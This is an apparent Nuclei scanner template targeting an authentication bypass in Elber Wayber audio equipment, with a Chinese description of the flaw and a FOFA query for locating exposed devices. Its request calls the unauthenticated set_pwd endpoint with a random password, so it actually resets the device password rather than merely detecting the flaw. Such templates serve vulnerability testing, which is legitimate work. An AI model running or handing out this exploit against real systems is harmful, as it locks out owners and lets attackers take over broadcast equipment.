http:
    - matchers:
        - part: body
          type: word
          words:
            - Apply successfully
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /json_data/set_pwd?lev=2&pass={{password}} HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
id: Elber-Wayber-Password-Reset
info:
    author: Superhero
    description: "fofa: title=\"Elber Satellite Equipment\" || body=\"www.elber.it\"\nElber wavber 模拟/数字音频系统存在一个严重的安全漏洞，该漏洞位于系统的密码重置功能中。攻击者可以通过利用此漏洞。绕过正常的身份验证流程，直接重置用户密码，从而非法获取系统访问权限。一旦攻击者成功重置密码，他们可以登录系统并完全接管控制权，进而窃取敏感数据、篡改系统设置或进行其他恶意操作。 "
    name: Elber Wayber 模拟/数字音频密码重置漏洞
    reference:
        - https://mp.weixin.qq.com/s/aFrc2mlOuPibI7oHETZomg
    severity: high
    tags:
        - Password Reset
        - uIP
variables:
    password: '{{to_lower(rand_base(6))}}'
